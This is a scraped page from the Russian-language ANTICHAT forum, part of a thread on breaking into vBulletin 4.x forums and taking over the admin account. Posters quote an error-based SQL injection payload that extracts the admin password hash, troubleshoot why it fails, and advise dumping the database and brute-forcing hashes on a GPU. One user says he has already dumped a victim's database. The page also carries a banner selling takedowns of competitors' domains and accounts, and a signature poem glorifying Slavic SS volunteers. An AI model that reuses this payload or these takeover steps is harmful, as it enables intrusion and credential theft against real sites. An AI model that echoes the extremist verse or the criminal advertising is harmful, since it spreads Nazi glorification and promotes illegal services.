УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт

Страница 3 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#21

21.06.2012, 00:36

Sat-hacker

Guest

Сообщений: n/a

Провел на форуме:
34457

Репутация: -10

Цитата:

Сообщение от linvel

linvel said:
скачать любой брут, в разделе криптография и бруть

Какой к примеру?

#22

21.06.2012, 02:23

Onths

Guest

Сообщений: n/a

Провел на форуме:
12204

Репутация: -4

Цитата:

Сообщение от Sat-hacker

Sat-hacker said:
А в какой именно таблице?Или просто откріть всю базу 1,5 GB в текстовом документе и через поиск искать id 1?

Да как угодно.

Можно вывести соль и пароль определенного юзера, а можно слить себе б.д и искать там, если есть такая возможность.

Брути обычным брутом по видяхе.

#23

21.06.2012, 02:46

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

Не в обиду ТС конечно, но нахер такую тему.

Цитата:

Сообщение от None

чтобы вытащить соль нужно вставлять такой код

__________________

#24

21.06.2012, 09:09

Sat-hacker

Guest

Сообщений: n/a

Провел на форуме:
34457

Репутация: -10

Базу уже слил,а вот как пароль там искать не пойму.

#25

22.06.2012, 16:16

Skipp

Новичок

Регистрация: 12.05.2010

Сообщений: 2

Провел на форуме:
33215

Репутация: 0

Цитата:

Сообщение от p0wER

p0wER said:
Красной полоской я отделил первоначальный код и код который вставили мы. Пришло время рассказать вам о проблеме с который можно столкнуться после отправки этого запроса. На скрине видно, что я обвел красным кружочком "vb_" - это префикс, который может быть в названиях таблиц в базе данных, если вы отправляете запрос без префикса, а в БД таблицы с префиксом, то очевидно вы никакого хэша не получите, только ошибку. Как быть в таком случае? Все очень просто, отправляем запрос без префиксов,
получаем страницу с ошибкой базы данных
, открываем исходный код страницы и ищем следующее:

Здравствуйте, подскажите как получить эту самую страницу с ошибкой, о которой пишет автор (выделено зелёным цветом). Я делал как в статье, в Live HTTP Replay в Post запрос дописывал код

Код:

Code:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

нажимаю повтор, а затем обновляю в Мозиле страницу с поиском??? Но ошибку на ней не выводит (вот здесь я может не то что-то делаю?)... Пробовал на разных версиях vBulletin

#26

22.06.2012, 16:20

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Цитата:

Сообщение от Skipp

Skipp said:
Здравствуйте, подскажите как получить эту самую страницу с ошибкой, о которой пишет автор (выделено зелёным цветом). Я делал как в статье, в Live HTTP Replay в Post запрос дописывал код

Код:

Code:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

может пофикшенная версия, может все таки ты что то не так делал, возможно пробелы не убрал , когда копировал запрос(форум имеет свойство поставить пробел в слове),

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

#27

22.06.2012, 18:55

Dr.Strangelove

Новичок

Регистрация: 01.12.2008

Сообщений: 26

Провел на форуме:
143670

Репутация: 10

мда.. ачат уже не тот, что ранее

#28

22.06.2012, 19:04

t3cHn0iD

Новичок

Регистрация: 06.04.2009

Сообщений: 2

Провел на форуме:
150479

Репутация: 2

Цитата:

Сообщение от Dr.Strangelove

Dr.Strangelove said:
мда.. ачат уже не тот, что ранее

Еще бы.В этой теме идет подмена кук, содержащих хэш залогиненного юзера, а это боян страшнейший.

#29

24.06.2012, 00:02

Loller

Guest

Сообщений: n/a

Провел на форуме:
209

Репутация: 0

Я извиняюсь за беспокойство, но мне не понятен один пункт.

Идем на сайт lj.onas/md5 и делаем все, что там написано

Что вписывать в поле здесь пишем свой текст, из которого надо получить md5?

Спасибо за ответ.